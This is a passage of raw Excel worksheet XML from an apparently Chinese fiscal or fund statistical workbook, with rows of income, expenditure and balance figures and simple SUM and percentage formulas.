      <c r="F27" s="4"/>
      <c r="G27" s="4"/>
      <c r="H27" s="4"/>
      <c r="I27" s="4"/>
      <c r="J27" s="4"/>
      <c r="K27" s="4"/>
      <c r="L27" s="4"/>
      <c r="M27" s="4"/>
    </row>
    <row r="28" spans="1:13" ht="14.25">
      <c r="A28" s="4"/>
      <c r="B28" s="4"/>
      <c r="C28" s="4"/>
      <c r="D28" s="4"/>
      <c r="E28" s="4"/>
      <c r="F28" s="4"/>
      <c r="G28" s="4"/>
      <c r="H28" s="4"/>
      <c r="I28" s="4"/>
      <c r="J28" s="4"/>
      <c r="K28" s="4"/>
      <c r="L28" s="4"/>
      <c r="M28" s="4"/>
    </row>
    <row r="29" spans="1:13" ht="14.25">
      <c r="A29" s="4"/>
      <c r="B29" s="4"/>
      <c r="C29" s="4"/>
      <c r="D29" s="4"/>
      <c r="E29" s="4"/>
      <c r="F29" s="4"/>
      <c r="G29" s="4"/>
      <c r="H29" s="4"/>
      <c r="I29" s="4"/>
      <c r="J29" s="4"/>
      <c r="K29" s="4"/>
      <c r="L29" s="4"/>
      <c r="M29" s="4"/>
    </row>
    <row r="30" spans="1:13" ht="14.25">
      <c r="A30" s="4"/>
      <c r="B30" s="4"/>
      <c r="C30" s="4"/>
      <c r="D30" s="4"/>
      <c r="E30" s="4"/>
      <c r="F30" s="4"/>
      <c r="G30" s="4"/>
      <c r="H30" s="4"/>
      <c r="I30" s="4"/>
      <c r="J30" s="4"/>
      <c r="K30" s="4"/>
      <c r="L30" s="4"/>
      <c r="M30" s="4"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:M30"/>
  </mergeCells>
  <printOptions/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51" footer="0.51"/>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1:K14"/>
  <sheetViews>
    <sheetView workbookViewId="0" topLeftCell="A1">
      <selection activeCell="A5" sqref="A5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="34.875" style="27" customWidth="1"/>
    <col min="2" max="3" width="17.875" style="27" customWidth="1"/>
    <col min="4" max="4" width="18.00390625" style="27" customWidth="1"/>
    <col min="5" max="5" width="33.125" style="27" customWidth="1"/>
    <col min="6" max="9" width="9.00390625" style="27" customWidth="1"/>
    <col min="10" max="10" width="10.875" style="27" bestFit="1" customWidth="1"/>
    <col min="11" max="16384" width="9.00390625" style="27" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5" ht="39" customHeight="1">
      <c r="A1" s="69" t="s">
        <v>1637</v>
      </c>
      <c r="B1" s="69"/>
      <c r="C1" s="69"/>
      <c r="D1" s="69"/>
      <c r="E1" s="69"/>
    </row>
    <row r="2" spans="1:5" ht="21" customHeight="1">
      <c r="A2" s="33" t="s">
        <v>1638</v>
      </c>
      <c r="B2" s="70"/>
      <c r="C2" s="70"/>
      <c r="D2" s="70"/>
      <c r="E2" s="53" t="s">
        <v>1639</v>
      </c>
    </row>
    <row r="3" spans="1:5" ht="53.25" customHeight="1">
      <c r="A3" s="55" t="s">
        <v>1621</v>
      </c>
      <c r="B3" s="55" t="s">
        <v>1640</v>
      </c>
      <c r="C3" s="55" t="s">
        <v>1641</v>
      </c>
      <c r="D3" s="12" t="s">
        <v>1642</v>
      </c>
      <c r="E3" s="55" t="s">
        <v>1643</v>
      </c>
    </row>
    <row r="4" spans="1:5" ht="33.75" customHeight="1">
      <c r="A4" s="71" t="s">
        <v>1644</v>
      </c>
      <c r="B4" s="71"/>
      <c r="C4" s="71"/>
      <c r="D4" s="71"/>
      <c r="E4" s="71"/>
    </row>
    <row r="5" spans="1:5" ht="35.25" customHeight="1">
      <c r="A5" s="72" t="s">
        <v>1645</v>
      </c>
      <c r="B5" s="73">
        <v>1570979</v>
      </c>
      <c r="C5" s="73">
        <v>1387889</v>
      </c>
      <c r="D5" s="74">
        <f>(C5/B5)*100</f>
        <v>88.3454839307209</v>
      </c>
      <c r="E5" s="75" t="s">
        <v>1646</v>
      </c>
    </row>
    <row r="6" spans="1:5" ht="35.25" customHeight="1">
      <c r="A6" s="72" t="s">
        <v>1647</v>
      </c>
      <c r="B6" s="73">
        <v>1498062</v>
      </c>
      <c r="C6" s="73">
        <v>1448013</v>
      </c>
      <c r="D6" s="74">
        <f aca="true" t="shared" si="0" ref="D6:D13">(C6/B6)*100</f>
        <v>96.65908353592843</v>
      </c>
      <c r="E6" s="76"/>
    </row>
    <row r="7" spans="1:5" ht="42.75" customHeight="1">
      <c r="A7" s="72" t="s">
        <v>1648</v>
      </c>
      <c r="B7" s="73">
        <f>B5-B6</f>
        <v>72917</v>
      </c>
      <c r="C7" s="73">
        <f>C5-C6</f>
        <v>-60124</v>
      </c>
      <c r="D7" s="74">
        <f t="shared" si="0"/>
        <v>-82.45539448962519</v>
      </c>
      <c r="E7" s="77" t="s">
        <v>1649</v>
      </c>
    </row>
    <row r="8" spans="1:5" ht="35.25" customHeight="1">
      <c r="A8" s="72" t="s">
        <v>1650</v>
      </c>
      <c r="B8" s="73">
        <v>1131532</v>
      </c>
      <c r="C8" s="73">
        <v>1110295</v>
      </c>
      <c r="D8" s="74">
        <f t="shared" si="0"/>
        <v>98.12316399359452</v>
      </c>
      <c r="E8" s="78"/>
    </row>
    <row r="9" spans="1:10" ht="36.75" customHeight="1">
      <c r="A9" s="71" t="s">
        <v>1651</v>
      </c>
      <c r="B9" s="73"/>
      <c r="C9" s="73"/>
      <c r="D9" s="74"/>
      <c r="E9" s="76"/>
      <c r="F9" s="79"/>
      <c r="G9" s="80"/>
      <c r="H9" s="80"/>
      <c r="I9" s="80"/>
      <c r="J9" s="80"/>
    </row>
    <row r="10" spans="1:11" ht="35.25" customHeight="1">
      <c r="A10" s="72" t="s">
        <v>1652</v>
      </c>
      <c r="B10" s="73">
        <v>660202</v>
      </c>
      <c r="C10" s="73">
        <v>642862</v>
      </c>
      <c r="D10" s="74">
        <f t="shared" si="0"/>
        <v>97.373531131381</v>
      </c>
      <c r="E10" s="75" t="s">
        <v>1646</v>
      </c>
      <c r="F10" s="80"/>
      <c r="G10" s="80"/>
      <c r="H10" s="80"/>
      <c r="I10" s="86"/>
      <c r="J10" s="80"/>
      <c r="K10" s="87"/>
    </row>
    <row r="11" spans="1:11" ht="35.25" customHeight="1">
      <c r="A11" s="72" t="s">
        <v>1653</v>
      </c>
      <c r="B11" s="57">
        <v>646902</v>
      </c>
      <c r="C11" s="73">
        <v>676820</v>
      </c>
      <c r="D11" s="74">
        <f t="shared" si="0"/>
        <v>104.62481179529513</v>
      </c>
      <c r="E11" s="81"/>
      <c r="F11" s="80"/>
      <c r="G11" s="82"/>
      <c r="H11" s="80"/>
      <c r="I11" s="86"/>
      <c r="J11" s="80"/>
      <c r="K11" s="87"/>
    </row>
    <row r="12" spans="1:11" ht="31.5" customHeight="1">
      <c r="A12" s="72" t="s">
        <v>1654</v>
      </c>
      <c r="B12" s="83">
        <f>B10-B11</f>
        <v>13300</v>
      </c>
      <c r="C12" s="83">
        <f>C10-C11</f>
        <v>-33958</v>
      </c>
      <c r="D12" s="74">
        <f t="shared" si="0"/>
        <v>-255.32330827067668</v>
      </c>
      <c r="E12" s="77" t="s">
        <v>1649</v>
      </c>
      <c r="I12" s="67"/>
      <c r="K12" s="87"/>
    </row>
    <row r="13" spans="1:5" ht="35.25" customHeight="1">
      <c r="A13" s="72" t="s">
        <v>1655</v>
      </c>
      <c r="B13" s="73">
        <v>479897</v>
      </c>
      <c r="C13" s="73">
        <v>457934</v>
      </c>
      <c r="D13" s="74">
        <f t="shared" si="0"/>
        <v>95.42339293640094</v>
      </c>
      <c r="E13" s="84"/>
    </row>
    <row r="14" spans="1:5" ht="35.25" customHeight="1">
      <c r="A14" s="85"/>
      <c r="B14" s="85"/>
      <c r="C14" s="85"/>
      <c r="D14" s="85"/>
      <c r="E14" s="85"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="3">
    <mergeCell ref="A1:E1"/>
    <mergeCell ref="E7:E8"/>
    <mergeCell ref="E12:E13"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.47" footer="0.47"/>
  <pageSetup firstPageNumber="51" useFirstPageNumber="1" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>
  <headerFooter scaleWithDoc="0" alignWithMargins="0">
    <oddFooter>&amp;C第 &amp;P 页</oddFooter>
  </headerFooter>
</worksheet>
</file>

<file path=xl/worksheets/sheet23.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:I51"/>
  <sheetViews>
    <sheetView workbookViewId="0" topLeftCell="A1">
      <selection activeCell="K8" sqref="K8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="28.875" style="27" customWidth="1"/>
    <col min="2" max="2" width="12.375" style="27" customWidth="1"/>
    <col min="3" max="9" width="12.375" style="28" customWidth="1"/>
    <col min="10" max="16384" width="9.00390625" style="27" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" ht="12.75" customHeight="1">
      <c r="A1" s="29"/>
      <c r="B1" s="30"/>
      <c r="C1" s="30"/>
      <c r="D1" s="30"/>
      <c r="E1" s="30"/>
      <c r="F1" s="30"/>
      <c r="G1" s="30"/>
      <c r="H1" s="30"/>
      <c r="I1" s="30"/>
    </row>
    <row r="2" spans="1:9" ht="27.75" customHeight="1">
      <c r="A2" s="32" t="s">
        <v>1656</v>
      </c>
      <c r="B2" s="32"/>
      <c r="C2" s="32"/>
      <c r="D2" s="32"/>
      <c r="E2" s="32"/>
      <c r="F2" s="32"/>
      <c r="G2" s="32"/>
      <c r="H2" s="32"/>
      <c r="I2" s="32"/>
    </row>
    <row r="3" spans="1:9" ht="21" customHeight="1">
      <c r="A3" s="33" t="s">
        <v>1657</v>
      </c>
      <c r="B3" s="34"/>
      <c r="C3" s="34"/>
      <c r="D3" s="34"/>
      <c r="E3" s="34"/>
      <c r="F3" s="34"/>
      <c r="G3" s="34"/>
      <c r="H3" s="36" t="s">
        <v>1639</v>
      </c>
      <c r="I3" s="36"/>
    </row>
    <row r="4" spans="1:9" s="52" customFormat="1" ht="49.5" customHeight="1">
      <c r="A4" s="54" t="s">
        <v>1658</v>
      </c>
      <c r="B4" s="54" t="s">
        <v>1659</v>
      </c>
      <c r="C4" s="54" t="s">
        <v>1660</v>
      </c>
      <c r="D4" s="54" t="s">
        <v>1661</v>
      </c>
      <c r="E4" s="54" t="s">
        <v>1662</v>
      </c>
      <c r="F4" s="54" t="s">
        <v>1663</v>
      </c>
      <c r="G4" s="54" t="s">
        <v>1664</v>
      </c>
      <c r="H4" s="54" t="s">
        <v>1665</v>
      </c>
      <c r="I4" s="54" t="s">
        <v>1666</v>
      </c>
    </row>
    <row r="5" spans="1:9" s="26" customFormat="1" ht="22.5" customHeight="1">
      <c r="A5" s="64" t="s">
        <v>1667</v>
      </c>
      <c r="B5" s="41">
        <f>C5+D5+E5+F5+G5+H5+I5</f>
        <v>1170419</v>
      </c>
      <c r="C5" s="41">
        <v>398070</v>
      </c>
      <c r="D5" s="41">
        <v>320492</v>
      </c>
      <c r="E5" s="41">
        <v>64580</v>
      </c>
      <c r="F5" s="41">
        <v>163853</v>
      </c>
      <c r="G5" s="41">
        <v>162764</v>
      </c>
      <c r="H5" s="41">
        <v>23276</v>
      </c>
      <c r="I5" s="41">
        <v>37384</v>
      </c>
    </row>
    <row r="6" spans="1:9" ht="22.5" customHeight="1">
      <c r="A6" s="65" t="s">
        <v>1668</v>
      </c>
      <c r="B6" s="41">
        <f aca="true" t="shared" si="0" ref="B6:B19">C6+D6+E6+F6+G6+H6+I6</f>
        <v>1387889</v>
      </c>
      <c r="C6" s="41">
        <f aca="true" t="shared" si="1" ref="C6:I6">SUM(C7:C12)</f>
        <v>391179</v>
      </c>
      <c r="D6" s="41">
        <f t="shared" si="1"/>
        <v>154673</v>
      </c>
      <c r="E6" s="41">
        <f t="shared" si="1"/>
        <v>325543</v>
      </c>
      <c r="F6" s="41">
        <f t="shared" si="1"/>
        <v>158898</v>
      </c>
      <c r="G6" s="41">
        <f t="shared" si="1"/>
        <v>320883</v>
      </c>
      <c r="H6" s="41">
        <f t="shared" si="1"/>
        <v>23592</v>
      </c>
      <c r="I6" s="41">
        <f t="shared" si="1"/>
        <v>13121</v>
      </c>
    </row>
    <row r="7" spans="1:9" ht="22.5" customHeight="1">
      <c r="A7" s="65" t="s">
        <v>1669</v>
      </c>
      <c r="B7" s="41">
        <f t="shared" si="0"/>
        <v>803915</v>
      </c>
      <c r="C7" s="60">
        <v>261211</v>
      </c>
      <c r="D7" s="41">
        <v>41407</v>
      </c>
      <c r="E7" s="41">
        <v>205813</v>
      </c>
      <c r="F7" s="41">
        <v>157300</v>
      </c>
      <c r="G7" s="41">
        <v>102864</v>
      </c>
      <c r="H7" s="41">
        <v>23254</v>
      </c>
      <c r="I7" s="57">
        <v>12066</v>
      </c>
    </row>
    <row r="8" spans="1:9" ht="22.5" customHeight="1">
      <c r="A8" s="65" t="s">
        <v>1670</v>
      </c>
      <c r="B8" s="41">
        <f t="shared" si="0"/>
        <v>18295</v>
      </c>
      <c r="C8" s="60">
        <v>4025</v>
      </c>
      <c r="D8" s="41">
        <v>10103</v>
      </c>
      <c r="E8" s="41">
        <v>785</v>
      </c>
      <c r="F8" s="41">
        <v>1362</v>
      </c>
      <c r="G8" s="41">
        <v>957</v>
      </c>
      <c r="H8" s="41">
        <v>328</v>
      </c>
      <c r="I8" s="57">
        <v>735</v>
      </c>
    </row>
    <row r="9" spans="1:9" ht="22.5" customHeight="1">
      <c r="A9" s="59" t="s">
        <v>1671</v>
      </c>
      <c r="B9" s="41">
        <f t="shared" si="0"/>
        <v>438600</v>
      </c>
      <c r="C9" s="60">
        <v>4901</v>
      </c>
      <c r="D9" s="41">
        <v>101227</v>
      </c>
      <c r="E9" s="41">
        <v>115415</v>
      </c>
      <c r="F9" s="41"/>
      <c r="G9" s="41">
        <v>217057</v>
      </c>
      <c r="H9" s="41"/>
      <c r="I9" s="57"/>
    </row>
    <row r="10" spans="1:9" ht="22.5" customHeight="1">
      <c r="A10" s="59" t="s">
        <v>1672</v>
      </c>
      <c r="B10" s="41">
        <f t="shared" si="0"/>
        <v>18996</v>
      </c>
      <c r="C10" s="60">
        <v>14481</v>
      </c>
      <c r="D10" s="41">
        <v>925</v>
      </c>
      <c r="E10" s="41">
        <v>3492</v>
      </c>
      <c r="F10" s="41">
        <v>82</v>
      </c>
      <c r="G10" s="41">
        <v>5</v>
      </c>
      <c r="H10" s="41">
        <v>10</v>
      </c>
      <c r="I10" s="57">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:9" ht="22.5" customHeight="1">
      <c r="A11" s="59" t="s">
        <v>1673</v>
      </c>
      <c r="B11" s="41">
        <f t="shared" si="0"/>
        <v>18833</v>
      </c>
      <c r="C11" s="60">
        <v>17311</v>
      </c>
      <c r="D11" s="41">
        <v>1011</v>
      </c>
      <c r="E11" s="41">
        <v>38</v>
      </c>
      <c r="F11" s="41">
        <v>154</v>
      </c>
      <c r="G11" s="41"/>
      <c r="H11" s="41"/>
      <c r="I11" s="57">
        <v>319</v>
      </c>
    </row>
    <row r="12" spans="1:9" ht="22.5" customHeight="1">
      <c r="A12" s="65" t="s">
        <v>1674</v>
      </c>
      <c r="B12" s="41">
        <f t="shared" si="0"/>
        <v>89250</v>
      </c>
      <c r="C12" s="60">
        <v>89250</v>
      </c>
      <c r="D12" s="60"/>
      <c r="E12" s="41"/>
      <c r="F12" s="41"/>
      <c r="G12" s="41"/>
      <c r="H12" s="41"/>
      <c r="I12" s="57"/>
    </row>
    <row r="13" spans="1:9" ht="22.5" customHeight="1">
      <c r="A13" s="65" t="s">
        <v>1675</v>
      </c>
      <c r="B13" s="41">
        <f t="shared" si="0"/>
        <v>1448013</v>
      </c>
      <c r="C13" s="41">
        <f>SUM(C14:C17)</f>
        <v>467245</v>
      </c>
      <c r="D13" s="41">
        <f aca="true" t="shared" si="2" ref="D13:I13">SUM(D14:D17)</f>
        <v>102052</v>
      </c>
      <c r="E13" s="41">
        <f t="shared" si="2"/>
        <v>333188</v>
      </c>
      <c r="F13" s="41">
        <f t="shared" si="2"/>
        <v>146476</v>
      </c>
      <c r="G13" s="41">
        <f t="shared" si="2"/>
        <v>362102</v>
      </c>
      <c r="H13" s="41">
        <f t="shared" si="2"/>
        <v>26242</v>
      </c>
      <c r="I13" s="41">
        <f t="shared" si="2"/>
        <v>10708</v>
      </c>
    </row>
    <row r="14" spans="1:9" ht="22.5" customHeight="1">
      <c r="A14" s="65" t="s">
        <v>1676</v>
      </c>
      <c r="B14" s="41">
        <f t="shared" si="0"/>
        <v>1396548</v>
      </c>
      <c r="C14" s="41">
        <v>465232</v>
      </c>
      <c r="D14" s="60">
        <v>101928</v>
      </c>
      <c r="E14" s="41">
        <v>333186</v>
      </c>
      <c r="F14" s="41">
        <v>146108</v>
      </c>
      <c r="G14" s="41">
        <v>320021</v>
      </c>
      <c r="H14" s="41">
        <v>25782</v>
      </c>
      <c r="I14" s="41">
        <v>4291</v>
      </c>
    </row>
    <row r="15" spans="1:9" ht="22.5" customHeight="1">
      <c r="A15" s="65" t="s">
        <v>1677</v>
      </c>
      <c r="B15" s="41">
        <f t="shared" si="0"/>
        <v>47280</v>
      </c>
      <c r="C15" s="60"/>
      <c r="D15" s="60"/>
      <c r="E15" s="41"/>
      <c r="F15" s="41"/>
      <c r="G15" s="41">
        <v>42081</v>
      </c>
      <c r="H15" s="41">
        <v>9</v>
      </c>
      <c r="I15" s="41">
        <v>5190</v>
      </c>
    </row>
    <row r="16" spans="1:9" ht="22.5" customHeight="1">
      <c r="A16" s="59" t="s">
        <v>1678</v>
      </c>
      <c r="B16" s="41">
        <f t="shared" si="0"/>
        <v>2507</v>
      </c>
      <c r="C16" s="66">
        <v>2013</v>
      </c>
      <c r="D16" s="60">
        <v>124</v>
      </c>
      <c r="E16" s="41">
        <v>2</v>
      </c>
      <c r="F16" s="41">
        <v>368</v>
      </c>
      <c r="G16" s="41"/>
      <c r="H16" s="41"/>
      <c r="I16" s="41"/>
    </row>
    <row r="17" spans="1:9" ht="22.5" customHeight="1">
      <c r="A17" s="59" t="s">
        <v>1679</v>
      </c>
      <c r="B17" s="41">
        <f t="shared" si="0"/>
        <v>1678</v>
      </c>
      <c r="C17" s="41"/>
      <c r="D17" s="60"/>
      <c r="E17" s="41"/>
      <c r="F17" s="41"/>
      <c r="G17" s="41"/>
      <c r="H17" s="41">
        <v>451</v>
      </c>
      <c r="I17" s="41">
        <v>1227</v>
      </c>
    </row>
    <row r="18" spans="1:9" ht="22.5" customHeight="1">
      <c r="A18" s="65" t="s">
        <v>1680</v>
      </c>
      <c r="B18" s="41">
        <f t="shared" si="0"/>
        <v>-60124</v>
      </c>
      <c r="C18" s="41">
        <f aca="true" t="shared" si="3" ref="C18:I18">C6-C13</f>
        <v>-76066</v>
      </c>
      <c r="D18" s="41">
        <f t="shared" si="3"/>
        <v>52621</v>
      </c>
      <c r="E18" s="41">
        <f t="shared" si="3"/>
        <v>-7645</v>
      </c>
      <c r="F18" s="41">
        <f t="shared" si="3"/>
        <v>12422</v>
      </c>
      <c r="G18" s="41">
        <f t="shared" si="3"/>
        <v>-41219</v>
      </c>
      <c r="H18" s="41">
        <f t="shared" si="3"/>
        <v>-2650</v>
      </c>
      <c r="I18" s="41">
        <f t="shared" si="3"/>
        <v>2413</v>
      </c>
    </row>
    <row r="19" spans="1:9" ht="22.5" customHeight="1">
      <c r="A19" s="65" t="s">
        <v>1681</v>
      </c>
      <c r="B19" s="41">
        <f t="shared" si="0"/>
        <v>1110295</v>
      </c>
      <c r="C19" s="41">
        <f aca="true" t="shared" si="4" ref="C19:I19">C5+C6-C13</f>
        <v>322004</v>
      </c>
      <c r="D19" s="41">
        <f t="shared" si="4"/>
        <v>373113</v>
      </c>
      <c r="E19" s="41">
        <f t="shared" si="4"/>
        <v>56935</v>
      </c>
      <c r="F19" s="41">
        <f t="shared" si="4"/>
        <v>176275</v>
      </c>
      <c r="G19" s="41">
        <f t="shared" si="4"/>
        <v>121545</v>
      </c>
      <c r="H19" s="41">
        <f t="shared" si="4"/>
        <v>20626</v>
      </c>
      <c r="I19" s="41">
        <f t="shared" si="4"/>
        <v>39797</v>
      </c>
    </row>
    <row r="20" spans="1:9" ht="12.75">
      <c r="A20" s="67"/>
      <c r="B20" s="67"/>
      <c r="C20" s="68"/>
      <c r="D20" s="68"/>
      <c r="E20" s="68"/>
      <c r="F20" s="68"/>
      <c r="G20" s="68"/>
      <c r="H20" s="68"/>
      <c r="I20" s="68"/>
    </row>
    <row r="21" spans="1:9" ht="12.75">
      <c r="A21" s="67"/>
      <c r="B21" s="67"/>
      <c r="C21" s="68"/>
      <c r="D21" s="68"/>
      <c r="E21" s="68"/>
      <c r="F21" s="68"/>
      <c r="G21" s="68"/>
      <c r="H21" s="68"/>
      <c r="I21" s="68"/>
    </row>
    <row r="22" spans="1:9" ht="12.75">
      <c r="A22" s="67"/>
      <c r="B22" s="67"/>
      <c r="C22" s="68"/>
      <c r="D22" s="68"/>
      <c r="E22" s="68"/>
      <c r="F22" s="68"/>
      <c r="G22" s="68"/>
      <c r="H22" s="68"/>
      <c r="I22" s="68"/>
    </row>
    <row r="23" spans="1:9" ht="12.75">
      <c r="A23" s="67"/>
      <c r="B23" s="67"/>
      <c r="C23" s="68"/>
      <c r="D23" s="68"/>
      <c r="E23" s="68"/>
      <c r="F23" s="68"/>
      <c r="G23" s="68"/>
      <c r="H23" s="68"/>
      <c r="I23" s="68"/>
    </row>
    <row r="24" spans="1:9" ht="12.75">
      <c r="A24" s="67"/>
      <c r="B24" s="67"/>
      <c r="C24" s="68"/>
      <c r="D24" s="68"/>
      <c r="E24" s="68"/>
      <c r="F24" s="68"/>
      <c r="G24" s="68"/>
      <c r="H24" s="68"/>
      <c r="I24" s="68"/>
    </row>
    <row r="25" spans="1:9" ht="12.75">
      <c r="A25" s="67"/>
      <c r="B25" s="67"/>
      <c r="C25" s="68"/>
      <c r="D25" s="68"/>
      <c r="E25" s="68"/>
      <c r="F25" s="68"/>
      <c r="G25" s="68"/>
      <c r="H25" s="68"/>
      <c r="I25" s="68"/>
    </row>
    <row r="26" spans="1:9" ht="12.75">
      <c r="A26" s="67"/>
      <c r="B26" s="67"/>
      <c r="C26" s="68"/>
      <c r="D26" s="68"/>
      <c r="E26" s="68"/>
      <c r="F26" s="68"/>
      <c r="G26" s="68"/>
      <c r="H26" s="68"/>
      <c r="I26" s="68"/>
    </row>
    <row r="27" spans="1:9" ht="12.75">
      <c r="A27" s="67"/>
      <c r="B27" s="67"/>
      <c r="C27" s="68"/>
      <c r="D27" s="68"/>
      <c r="E27" s="68"/>
      <c r="F27" s="68"/>
      <c r="G27" s="68"/>
      <c r="H27" s="68"/>
      <c r="I27" s="68"/>
    </row>
    <row r="28" spans="1:9" ht="12.75">
      <c r="A28" s="67"/>
      <c r="B28" s="67"/>
      <c r="C28" s="68"/>
      <c r="D28" s="68"/>
      <c r="E28" s="68"/>
      <c r="F28" s="68"/>
      <c r="G28" s="68"/>
      <c r="H28" s="68"/>
      <c r="I28" s="68"/>
    </row>
    <row r="29" spans="1:9" ht="12.75">
      <c r="A29" s="67"/>
      <c r="B29" s="67"/>
      <c r="C29" s="68"/>
      <c r="D29" s="68"/>
      <c r="E29" s="68"/>
      <c r="F29" s="68"/>
      <c r="G29" s="68"/>
      <c r="H29" s="68"/>
      <c r="I29" s="68"/>
    </row>
    <row r="30" spans="1:9" ht="12.75">
      <c r="A30" s="67"/>
      <c r="B30" s="67"/>
      <c r="C30" s="68"/>
      <c r="D30" s="68"/>
      <c r="E30" s="68"/>
      <c r="F30" s="68"/>
      <c r="G30" s="68"/>
      <c r="H30" s="68"/>
      <c r="I30" s="68"/>
    </row>
    <row r="31" spans="1:9" ht="12.75">
      <c r="A31" s="67"/>
      <c r="B31" s="67"/>
      <c r="C31" s="68"/>
      <c r="D31" s="68"/>
      <c r="E31" s="68"/>
      <c r="F31" s="68"/>
      <c r="G31" s="68"/>
      <c r="H31" s="68"/>
      <c r="I31" s="68"/>
    </row>
    <row r="32" spans="1:9" ht="12.75">
      <c r="A32" s="67"/>
      <c r="B32" s="67"/>
      <c r="C32" s="68"/>
      <c r="D32" s="68"/>
      <c r="E32" s="68"/>
      <c r="F32" s="68"/>
      <c r="G32" s="68"/>
      <c r="H32" s="68"/>
      <c r="I32" s="68"/>
    </row>
    <row r="33" spans="1:9" ht="12.75">
      <c r="A33" s="67"/>
      <c r="B33" s="67"/>
      <c r="C33" s="68"/>
      <c r="D33" s="68"/>
      <c r="E33" s="68"/>
      <c r="F33" s="68"/>
      <c r="G33" s="68"/>
      <c r="H33" s="68"/>
      <c r="I33" s="68"/>
    </row>
    <row r="34" spans="1:9" ht="12.75">
      <c r="A34" s="67"/>
      <c r="B34" s="67"/>
      <c r="C34" s="68"/>
      <c r="D34" s="68"/>
      <c r="E34" s="68"/>
      <c r="F34" s="68"/>
      <c r="G34" s="68"/>
      <c r="H34" s="68"/>
      <c r="I34" s="68"/>
    </row>
    <row r="35" spans="1:9" ht="12.75">
      <c r="A35" s="67"/>
      <c r="B35" s="67"/>
      <c r="C35" s="68"/>
      <c r="D35" s="68"/>
      <c r="E35" s="68"/>
      <c r="F35" s="68"/>
      <c r="G35" s="68"/>
      <c r="H35" s="68"/>
      <c r="I35" s="68"/>
    </row>
    <row r="36" spans="1:9" ht="12.75">
      <c r="A36" s="67"/>
      <c r="B36" s="67"/>
      <c r="C36" s="68"/>
      <c r="D36" s="68"/>
      <c r="E36" s="68"/>
      <c r="F36" s="68"/>
      <c r="G36" s="68"/>
      <c r="H36" s="68"/>
      <c r="I36" s="68"/>
    </row>
    <row r="37" spans="1:9" ht="12.75">
      <c r="A37" s="67"/>
      <c r="B37" s="67"/>
      <c r="C37" s="68"/>
      <c r="D37" s="68"/>
      <c r="E37" s="68"/>
      <c r="F37" s="68"/>
      <c r="G37" s="68"/>
      <c r="H37" s="68"/>
      <c r="I37" s="68"/>
    </row>
    <row r="38" spans="1:9" ht="12.75">
      <c r="A38" s="67"/>
      <c r="B38" s="67"/>
      <c r="C38" s="68"/>
      <c r="D38" s="68"/>
      <c r="E38" s="68"/>
      <c r="F38" s="68"/>
      <c r="G38" s="68"/>
      <c r="H38" s="68"/>
      <c r="I38" s="68"/>
    </row>
    <row r="39" spans="1:9" ht="12.75">
      <c r="A39" s="67"/>
      <c r="B39" s="67"/>
      <c r="C39" s="68"/>
      <c r="D39" s="68"/>
      <c r="E39" s="68"/>
      <c r="F39" s="68"/>
      <c r="G39" s="68"/>
      <c r="H39" s="68"/>
      <c r="I39" s="68"/>
    </row>
    <row r="40" spans="1:9" ht="12.75">
      <c r="A40" s="67"/>
      <c r="B40" s="67"/>
      <c r="C40" s="68"/>
      <c r="D40" s="68"/>
      <c r="E40" s="68"/>
      <c r="F40" s="68"/>
      <c r="G40" s="68"/>
      <c r="H40" s="68"/>
      <c r="I40" s="68"/>
    </row>
    <row r="41" spans="1:9" ht="12.75">
      <c r="A41" s="67"/>
      <c r="B41" s="67"/>
      <c r="C41" s="68"/>
      <c r="D41" s="68"/>
      <c r="E41" s="68"/>
      <c r="F41" s="68"/>
      <c r="G41" s="68"/>
      <c r="H41" s="68"/>
      <c r="I41" s="68"/>
    </row>
    <row r="42" spans="1:9" ht="12.75">
      <c r="A42" s="67"/>
      <c r="B42" s="67"/>
      <c r="C42" s="68"/>
      <c r="D42" s="68"/>
      <c r="E42" s="68"/>
      <c r="F42" s="68"/>
      <c r="G42" s="68"/>
      <c r="H42" s="68"/>
      <c r="I42" s="68"/>
    </row>
    <row r="43" spans="1:9" ht="12.75">
      <c r="A43" s="67"/>
      <c r="B43" s="67"/>
      <c r="C43" s="68"/>
      <c r="D43" s="68"/>
      <c r="E43" s="68"/>
      <c r="F43" s="68"/>
      <c r="G43" s="68"/>
      <c r="H43" s="68"/>
      <c r="I43" s="68"/>
    </row>
    <row r="44" spans="1:9" ht="12.75">
      <c r="A44" s="67"/>
      <c r="B44" s="67"/>
      <c r="C44" s="68"/>
      <c r="D44" s="68"/>
      <c r="E44" s="68"/>
      <c r="F44" s="68"/>
      <c r="G44" s="68"/>
      <c r="H44" s="68"/>
      <c r="I44" s="68"/>
    </row>
    <row r="45" spans="1:9" ht="12.75">
      <c r="A45" s="67"/>
      <c r="B45" s="67"/>
      <c r="C45" s="68"/>
      <c r="D45" s="68"/>
      <c r="E45" s="68"/>
      <c r="F45" s="68"/>
      <c r="G45" s="68"/>
      <c r="H45" s="68"/>
      <c r="I45" s="68"/>
    </row>
    <row r="46" spans="1:9" ht="12.75">
      <c r="A46" s="67"/>
      <c r="B46" s="67"/>
      <c r="C46" s="68"/>
      <c r="D46" s="68"/>
      <c r="E46" s="68"/>
      <c r="F46" s="68"/>
      <c r="G46" s="68"/>
      <c r="H46" s="68"/>
      <c r="I46" s="68"/>
    </row>
    <row r="47" spans="1:9" ht="12.75">
      <c r="A47" s="67"/>
      <c r="B47" s="67"/>
      <c r="C47" s="68"/>
      <c r="D47" s="68"/>
      <c r="E47" s="68"/>
      <c r="F47" s="68"/>
      <c r="G47" s="68"/>
      <c r="H47" s="68"/>
      <c r="I47" s="68"/>
    </row>
